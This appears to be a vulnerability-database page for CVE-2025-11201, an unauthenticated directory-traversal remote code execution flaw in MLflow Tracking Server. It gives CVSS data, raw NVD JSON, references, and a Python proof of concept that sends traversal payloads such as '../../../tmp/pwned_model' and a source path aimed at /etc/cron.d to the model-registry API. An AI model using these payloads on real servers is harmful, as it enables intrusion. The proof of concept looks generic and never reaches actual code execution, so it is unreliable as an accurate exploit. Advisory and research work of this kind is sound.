CVE-2025-11201

Description

MLflow Tracking Server Model Creation Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of model file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26921.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* - VULNERABLE

MLflow Tracking Server < 修复版本

MLflow 所有版本（截至2025-10-29）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-11201 PoC - MLflow Directory Traversal RCE
# Target: MLflow Tracking Server
# Vulnerability: Path traversal in model creation allows RCE

TARGET_URL = "http://target-mlflow-server:5000"

def exploit_directory_traversal():
    """
    Exploit CVE-2025-11201: Directory Traversal in MLflow model creation
    This PoC demonstrates how an attacker can use path traversal to write
    files to arbitrary locations on the MLflow server.
    """
    
    # Malicious model name with directory traversal payload
    # This attempts to write outside the intended model directory
    malicious_name = "../../../tmp/pwned_model"
    
    # Create model with path traversal in name
    create_model_payload = {
        "name": malicious_name,
        "description": "Malicious model created via path traversal"
    }
    
    try:
        # Step 1: Create model with traversal path
        response = requests.post(
            f"{TARGET_URL}/api/2.0/mlflow/model-registry/create-model",
            json=create_model_payload,
            timeout=10
        )
        print(f"[*] Create model response: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        # Step 2: Register model version (additional attack surface)
        register_payload = {
            "name": malicious_name,
            "source": "file:///var/mlflow/models/../../../etc/cron.d/malicious"
        }
        
        response = requests.post(
            f"{TARGET_URL}/api/2.0/mlflow/model-registry/register-model-version",
            json=register_payload,
            timeout=10
        )
        print(f"[*] Register model version response: {response.status_code}")
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11201 PoC - MLflow Directory Traversal RCE")
    print("=" * 60)
    exploit_directory_traversal()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11201
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11201
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11201/
[4] VulDB https://vuldb.com/cve/CVE-2025-11201
[5] https://github.com/B-Step62/mlflow/commit/2e02bc7bb70df243e6eb792689d9b8eba0013161
[6] https://www.zerodayinitiative.com/advisories/ZDI-25-931/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11201", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:35.680", "lastModified": "2025-11-04T21:22:41.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MLflow Tracking Server Model Creation Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of model file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26921."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-06-10", "matchCriteriaId": "5D3A5C42-816B-4579-8616-C8A4D0C3483D"}]}]}], "references": [{"url": "https://github.com/B-Step62/mlflow/commit/2e02bc7bb70df243e6eb792689d9b8eba0013161", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-931/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}